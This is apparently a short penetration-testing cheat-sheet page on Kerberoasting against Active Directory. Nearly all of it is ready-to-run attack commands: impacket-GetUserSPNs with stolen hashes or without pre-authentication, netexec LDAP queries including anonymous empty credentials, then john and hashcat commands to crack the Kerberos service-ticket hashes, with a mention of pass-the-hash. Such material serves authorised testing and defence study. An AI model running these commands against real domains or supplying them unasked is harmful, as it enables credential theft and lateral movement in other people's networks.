Kerberoasting Attack

Last modified: 2023-12-14

Active Directory Windows

Kerberoasting is a attack technique against Kerberos with cracking passwords using a credential already gathered.


If we have a password hash of a user, we might be able to find another user credential using the hash.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt
# Without pre-authentication
# -no-preauth:
impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host <ip-or-host> example.local/

netexec ldap <target-ip> -u username -p password --kerberoasting output.txt
netexec ldap <target-ip> -u '' -p '' --kerberoasting output.txt

After finding hashes, we can crack it or use for pass-the-hash attack.
To crack, run the following commands:

john --format=krb5tgs --wordlist=wordlist.txt hash.txt
# or
hashcat -m 13100 -a 0 hash.txt wordlist.txt